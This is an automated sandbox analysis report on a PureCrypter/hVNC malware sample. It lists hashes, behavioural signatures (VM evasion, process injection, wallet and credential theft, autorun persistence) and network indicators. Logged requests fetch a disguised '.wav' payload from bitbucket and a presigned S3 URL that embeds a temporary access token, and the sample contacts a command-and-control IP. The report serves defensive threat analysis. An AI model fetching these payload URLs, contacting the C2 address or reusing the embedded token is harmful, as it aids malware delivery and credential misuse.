Windows Analysis Report
hvnc-CR-SCR-0710.bin.exe

Overview

General Information

Sample name: hvnc-CR-SCR-0710.bin.exe
Analysis ID: 1532602
MD5: 177136a947a8677c09fc4c9891b18dde
SHA1: cc5dbbaa959a97603e6a647e25f7de47777cc6c3
SHA256: adbca36fa3dab9cbc2ba34e3343c2cb6726ea5ef0064b293a01a1f396a454264
Tags: exehvncuser-01Xyris
Infos:

Detection

PureCrypter
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
AI detected suspicious sample
Detected PureCrypter Trojan
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
PureCrypter According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter

AV Detection
barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\msql2.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\msql2.exe Virustotal: Detection: 34% Perma Link
Multi AV Scanner detection for submitted file
Source: hvnc-CR-SCR-0710.bin.exe ReversingLabs: Detection: 26%
Source: hvnc-CR-SCR-0710.bin.exe Virustotal: Detection: 34% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\msql2.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: hvnc-CR-SCR-0710.bin.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log Jump to behavior
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.30.95:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.217.90.148:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 54.231.232.1:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: hvnc-CR-SCR-0710.bin.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1745552576.00000000066C0000.00000004.08000000.00040000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000003168000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003A49000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003762000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then mov eax, dword ptr [ebp-30h] 0_2_064E0168
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 0_2_064E11D8
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 0_2_064E11D0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064F4EB1h 0_2_064F4E50
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064FCEE8h 0_2_064FCE28
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064FCEE8h 0_2_064FCE30
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064F4388h 0_2_064F42F0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064F4388h 0_2_064F4300
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then jmp 064F4EB1h 0_2_064F502C
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_0651D428
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then mov eax, dword ptr [ebp-30h] 2_2_060E0168
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 2_2_060E11D8
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 2_2_060E11D0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4EB1h 2_2_060F4E17
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060FCEE8h 2_2_060FCE28
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060FCEE8h 2_2_060FCE30
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4EB1h 2_2_060F4E50
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4388h 2_2_060F42F0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4388h 2_2_060F4300
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 060F4EB1h 2_2_060F502C
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 2_2_0611D428
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 5_2_06AE11D8
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 5_2_06AE11D0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then mov eax, dword ptr [ebp-30h] 5_2_06AE0168
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AFCEE8h 5_2_06AFCE28
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AFCEE8h 5_2_06AFCE30
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4EB1h 5_2_06AF4E17
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4EB1h 5_2_06AF4E50
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4388h 5_2_06AF42F0
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4388h 5_2_06AF4300
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then jmp 06AF4EB1h 5_2_06AF502C
Source: C:\Users\user\AppData\Roaming\msql2.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 5_2_06B1D428

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 31.41.244.211:56001 -> 192.168.2.4:49732
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49732 -> 31.41.244.211:56001
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.166.143.49 185.166.143.49
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AEROEXPRESS-ASRU AEROEXPRESS-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.211
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: InstallUtil.exe, 00000001.00000002.4146654495.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
